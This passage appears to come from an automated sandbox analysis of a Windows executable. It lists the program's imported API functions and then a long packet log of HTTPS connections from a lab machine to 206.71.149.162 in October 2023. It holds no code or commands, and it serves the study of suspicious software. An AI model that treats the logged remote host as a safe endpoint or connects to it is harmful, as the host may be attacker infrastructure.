| USER32.dll | ShowWindow, GetMessageW, DefWindowProcW, DestroyWindow, MessageBoxW, CreateWindowExW, EndDialog, RegisterClassExW, LoadAcceleratorsW, LoadStringW, BeginPaint, DispatchMessageW, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, PostQuitMessage, DialogBoxParamW, UpdateWindow, LoadImageW |
| GDI32.dll | SelectObject, CreateCompatibleDC, GetObjectW, BitBlt |
| KERNEL32.dll | SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, GetProcessHeap, LCMapStringW, CompareStringW, CreateFileW, WriteConsoleW, DecodePointer, HeapSize, RaiseException, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 24, 2023 06:55:17.679820061 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:17.679871082 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:17.679938078 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:17.695286989 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:17.695302963 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.052529097 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.052668095 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.142723083 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.142756939 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.143804073 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.143975019 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.148178101 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.194461107 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.370417118 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.370515108 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.370536089 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.370614052 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.376287937 CEST | 49737 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.376323938 CEST | 443 | 49737 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.378245115 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.378288984 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.378371954 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.378833055 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.378842115 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.725766897 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.725852966 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.726342916 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.726352930 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:18.726695061 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:18.726700068 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.067732096 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.067804098 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.067841053 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.067871094 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.067886114 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.067914009 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.233705997 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.233771086 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.233861923 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.233889103 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.233927011 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.233966112 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.233983040 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.243599892 CEST | 49738 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.243628025 CEST | 443 | 49738 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.696221113 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.696269989 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:19.696343899 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.696878910 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:19.696897984 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.039067984 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.039175987 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.078126907 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.078138113 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.078582048 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.078588009 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.369945049 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.370035887 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.370038033 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.370091915 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.371419907 CEST | 49739 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.371438026 CEST | 443 | 49739 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.447151899 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.447191000 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.447282076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.447859049 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.447874069 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.797532082 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.797662020 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.798535109 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.798547983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:20.798883915 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:20.798890114 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.131869078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.131937981 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.131978035 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.132009983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.132025957 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.132054090 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.299052000 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.299145937 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.299635887 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.299710989 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.300055981 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.300123930 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.466533899 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.466751099 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.466787100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.466854095 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.467312098 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.467381954 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.467711926 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.467775106 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.468128920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.468199015 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.468568087 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.468633890 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.469038010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.469105005 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.634243965 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.634360075 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.634510040 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.634670019 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.634788990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.634845972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.635160923 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.635224104 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.635565042 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.635629892 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.635957956 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.636028051 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.636616945 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.636682987 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.637207985 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.637273073 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.637645006 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.637708902 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.638016939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.638077974 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.638613939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.638679028 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.639048100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.639112949 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.801516056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.801604986 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.801670074 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.801729918 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.802037001 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.802103043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.802329063 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.802395105 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.802966118 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.803030968 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.803443909 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.803508043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.804018974 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.804085970 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.804311991 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.804377079 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.804883003 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.804939032 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.805295944 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.805360079 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.805725098 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.805787086 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.806188107 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.806248903 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.806787968 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.806853056 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.807101011 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.807291031 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.807638884 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.807702065 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.808120966 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.808186054 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.808612108 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.808676004 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.809139967 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.809201956 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.809720039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.809783936 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.810161114 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.810225964 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.810580969 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.810646057 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.811054945 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.811125994 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.811475039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.811538935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.811845064 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.811904907 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.812241077 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.812304020 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.812736988 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.812798023 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.969011068 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.969136000 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.969199896 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.969269991 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.969793081 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.969887972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.970067978 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.970138073 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.970535040 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.970602036 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.970931053 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.971018076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.971379995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.971451044 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.971952915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.972028017 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.972388983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.972456932 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.972990990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.973061085 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.973392010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.973459005 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.973776102 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.973836899 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.974281073 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.974344969 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.974601030 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.974657059 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.974883080 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.974939108 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.975213051 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.975274086 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.975725889 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.975796938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.976161957 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.976222038 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.976551056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.976609945 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.977046013 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.977103949 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.977320910 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.977380037 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.977778912 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.977838039 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.978271008 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.978332996 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.978554010 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.978611946 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.979044914 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.979106903 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.979521990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.979579926 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.980046988 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.980113983 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.980392933 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.980453968 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.980745077 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.980801105 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.981178045 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.981234074 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.981504917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.981561899 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.981843948 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.981903076 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.982237101 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.982295036 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.982563972 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.982623100 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.983850956 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.983907938 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.984216928 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.984280109 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.984734058 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.984797001 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.985187054 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.985250950 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.985666037 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:21.985721111 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:21.986438990 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
